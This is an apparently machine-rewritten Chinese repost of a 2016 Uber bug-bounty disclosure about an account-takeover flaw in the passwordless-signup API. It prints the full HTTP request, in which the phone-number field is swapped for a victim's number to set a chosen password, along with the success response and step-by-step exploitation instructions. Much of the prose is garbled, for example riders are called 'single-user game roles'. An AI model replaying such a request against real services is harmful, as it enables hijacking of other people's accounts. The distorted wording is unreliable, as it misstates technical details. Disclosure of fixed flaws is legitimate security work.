漏洞利用细节:改变任意用户的Uber密码

漏洞利用细节:改变任意用户的Uber密码,第1张

漏洞利用细节:改变任意用户的Uber密码

漏洞状态:已解决(已关闭)

发布时间:2016年7月15日凌晨5点38分。

报告的总体目标:优步

漏洞类型:身份验证类

奖金:10,000美元

漏洞概述:

优步是一款全球即时交通移动应用。这款手机软件已经覆盖了中国60多个,全球300多个大都市。优步的重要目的是为您提供更安全舒适的城市交通,改善大城市的城市公共交通。

根据优步移动智能终端中的/rt/users/password-signup,黑客只要掌握整体目标客户的手机号,就可以修改整体目标客户的优步账户的登录密码。然而,事实上,黑客可以继续列举手机号码的类型,直到他们出示申请注册优步帐户的手机号码。

目前,安全系数研究方面的专家教授已经对优步的访客进行了漏洞测试,发现这个漏洞很可能同样适用于优步的司机和单用户游戏角色。

请求/答复:

以下信息取自app客户端的互联网技术请求数据信息(客户具体手机号已被xxxx替代):

POST /rt/users/passwordless-signup HTTP/1.1 Host: cn-geo1.uber.com User-Agent: client/iphone/2.137.1 Connection: close Content-Type: application/json Content-Length: 197 {"phoneNumberE164":"xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}


符合互联网技术要求的网站服务回复信息如下:

{"phoneNumberE164":"xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}

漏洞应用的全过程:

首先,每个人都必须创建一个新的优步访客帐户。在整个实验过程中,安全系数的研究人员使用了iOS系统软件,但是这个漏洞不会受到系统软件综合服务平台的伤害。

验证成功后,将再次向优步的网站服务器发送上述互联网技术请求,但在推送消息前,必须将“phoneNumberE164”的值更改为关系账户的手机号码(手机号码必须包含我国号码作为前缀,以“”开头)。比如美国手机号的前缀码是1xxx)。在某些情况下,很有可能你必须推送两次互联网技术请求,否则你可能无法接收到服务器发送的回复消息。最后大家很可能会收到内容为“密码已创建”的提示信息,说明大家已经获得了成功升级整体目标账号的账号登录密码。整个目标帐户的密码是请求中“newPassword”字段的值。

这样,每个人都可以在http://riders.uber.com/或其他地方使用密码登录这个帐户。

在此之前,优步一直是黑客们经常选择的攻击目标。早在2014年,优步公司就造成了严重的数据信息泄露。此次事件中,约5万名优步出租车司机的姓名和驾照信息被盗。此外,2016年上半年,优步综合服务平台下的多个账户信息竟然出现在暗网站市场销售中,多条客户信息泄露。因此,优步的专业技术人员应该真正检查他们产品的安全性能。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/771850.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-03
下一篇 2022-05-03

发表评论

登录后才能评论

评论列表(0条)

保存